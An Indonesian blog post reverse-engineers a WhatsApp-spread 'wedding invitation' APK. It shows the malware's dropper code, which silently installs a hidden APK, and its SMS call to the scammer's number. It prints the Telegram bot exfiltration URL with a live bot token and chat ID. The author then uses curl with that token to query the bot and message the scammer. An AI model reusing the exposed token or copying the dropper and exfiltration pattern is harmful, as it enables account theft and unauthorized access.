Kemana aliran data Undangan Pernikahan.apk?

By | November 11, 2025
371 Views

Apakah kalian pernah mendapatkan pesan via WA dengan judul Undangan Pernikahan.apk? Yup pesan tersebut berisi malware buat nyedot semua data yang kamu punya, mem by pass SMS / OTP sehingga akun mobile banking mu bisa terkuras habis. Berikut adalah no WA yang telah dibajak oleh penipu buat  sebarkan malware nya. Ternyata yang bikin agak goblog juga alias amatiran!
File nya terlalu besar sehingga orang/target akan males buat download!

Salah satu tools yang bisa kalian gunakan untuk reverse engineering yaitu jadx. Bila kalian penggunakan macbook, bisa install

brew install jadx

mari kita analisis kode nya, saya ubah terlebih dahulu nama aplikasi diatas menjadi myapp.apk biar mudah saja

jadx-gui myapp.apk

akan tampil kotak dialog, langsung menuju saja file MainActivity bila kita lihat lagi

protected void onCreate(Bundle savedInstanceState) throws IOException {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    installApkFromAssets();
}

Saat aplikasi dijalankan (onCreate()), langsung memanggil installApkFromAssets() tanpa interaksi pengguna.

kita telusuri lagi

private void installApkFromAssets() throws IOException {
    AssetManager assetManager = getAssets();
    InputStream in = assetManager.open(APK_NAME);
  • APK_NAME = ".apk" artinya program mencoba membuka file bernama .apk yang disembunyikan di folder assets/ (tanpa nama, hanya ekstensi).

  • Ini tidak lazim untuk aplikasi normal, karena .apk biasanya diberi nama jelas.

Mari kita buka folder asset

ternyata bersembunyi disitu, kita export saja dan diberi nama curiga.apk. Mari kita lihat isinya apa saja

https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/sendMessage?parse_mode=markdown&chat_id=8101458124&text

yup ternyata dilempar ke bot telegram

  • chat_id: 8101458124

  • Nomor telepon tujuan SMS: 082297940781

Menarik sekali, kita cek lagi, apakah WA nya aktif dari penipu? dari kode tertera

SmsManager.getDefault().sendTextMessage("082297940781", null, "sukses ", null, null);

mari kita cek!

ternyata aktif juga, mari kita cek BOT telegram pada source code tersebut

curl -s "https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/getMe" | jq

{
  "ok": true,
  "result": {
    "id": 8425955984,
    "is_bot": true,
    "first_name": "Botwooow",
    "username": "Aaallkkjjhh_bot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false,
    "can_connect_to_business": false,
    "has_main_web_app": false
  }
}

ternyata dilempar ke bot telegram, mari kita cek dilempar kemana lagi

curl -s "https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/getChat?chat_id=8101458124" | jq 

{
  "ok": true,
  "result": {
    "id": 8101458124,
    "first_name": "Gggggg",
    "username": "Jabebalu",
    "type": "private",
    "can_send_gift": true,
    "active_usernames": [
      "Jabebalu"
    ],
    "accepted_gift_types": {
      "unlimited_gifts": true,
      "limited_gifts": true,
      "unique_gifts": true,
      "premium_subscription": true
    },
    "max_reaction_count": 11,
    "accent_color_id": 4
  }
}

ternyata ke username Jabebalu sebagai pemegang data terakhir!

See also  Alamat IP dan Vulnerable nya bagus untuk uji pentest

sekalian kita kirim pesan ke penipu via URL

https://api.telegram.org/bot8425955984:AAG5HI9gM4SgKNu__BKN7y3AB2gcVJhT2mo/sendMessage?parse_mode=markdown&chat_id=8101458124&text=ente%20goblog

itulah pesan cinta dari saya buat penipu

Saran saja buat penipu,
filenya terlalu besar ukurannya! bodoh sekali bikin file segede itu terlalu banyak pakai library